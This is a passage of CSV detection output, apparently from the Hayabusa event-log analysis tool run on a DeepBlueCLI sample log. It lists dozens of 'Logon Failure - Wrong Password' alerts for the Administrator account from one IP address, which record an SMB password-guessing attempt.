NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06YmUCHNZqbaZMdZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fYoENCtP2uPy9xNh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TRJRuXJTTH1afAfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpnkzTlc3Uvj3hpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIuD8haFzR8P87rL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL1IreMAiE564NXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMUiCaMGBC46MnPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MOSWbwooyb60LExG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSDNF7s3vbtkZIOz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JBMk0qOV6237XtK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j41R1U1tYPvApCkZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcPkVZSeg5VwChW8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDLxt5gaFDTKsiVl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94JvBKdxJkawQQMT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KgBMk00K3iC1GQem : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XdGOj9Ybm6bcCo3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: by6F4YKorxhp5ahn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1G6ZOgOaV6luDQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qqSwNfvpPLQd6ZH1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mxtJJj54xSzHibHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Y3yznfdaZ7dtwDO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esllFn4asbLxwkBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Pr0cgd6cF5ukhZ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pS2fabTrbl6rZ1NB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkylDDmUyuT57HdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Aqs8rSvuLAQuhfDp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KI07KTgBJc4kBSKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Re3n3nJ8EEhRRT3G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BzspAC3z1csEn0Ve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tpkb6bf42SLUst3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1F5d2wn60OgAExW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bhPNRHWhTyonDPuA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zEsnyWpUuHVBo6et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I2FwaWy9TALkk9eU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fuikeQsxlOUVifVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZWdsRJp9fHypPI1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0j0IBX2eZnx99n9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YIZ5Knxg0xr0WmDb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wuej3f7mEoWmd4SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0LcCi06ilIhFPwb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWsCGgoFmH06rRf4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP47JjNKqtYIZPsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mNlWZ9o0xf7bl2d0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnPnB2lEN3BSDpXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVMyeF9jGuzHkTHg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sDKLl3PjW2qrzJGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkllnePSq3NQ5wgC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9qLWgQnR7P9cs7s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1AdU07nzvv7RB2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cHgiB5SMiQtsl5oD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 03e7QOn36l0jH35H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DoJBywV8x8cURwrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDYGYO6s6g6Dbx8r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nUqXpeTNePFyBmCo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2h0qJWcbzRe1GSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edsfNOovOl1Ow503 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cxCC83XLMIJrNMvl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzussOcg5ihdrnD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 55l4HKICu8x0FpQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5GmlVWDjZ75tT08G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6v1DkuFvB04PESQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTLdNb0XbzXuLi51 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSjDYb1BhHC9UTxO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1yLH19VsfLx9BGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4AVhjdz9yHsfss0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqWLOKaKwS8VBxDj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjK8A8DTSYursBzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaDCKPslwRaLBWtH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAvoekviFDSAIgBe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3XOmFwh8IamESWCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 54GbW769j1x27mrI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bZSkhwZXc1SSknDT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 05AuqlN44x7oJGoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ4A6ReTVTcFCFeN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T7U6i4CMrL0bHouf : IP Address: 192.168.198.149 : AuthPackage: 